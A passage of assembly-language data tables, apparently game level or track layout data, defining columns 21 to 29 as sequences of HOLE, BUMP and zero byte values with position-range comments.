dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column21Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column22Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column23Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column24Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column25Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column26Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column27Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column28Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 160-141 dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column29Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP 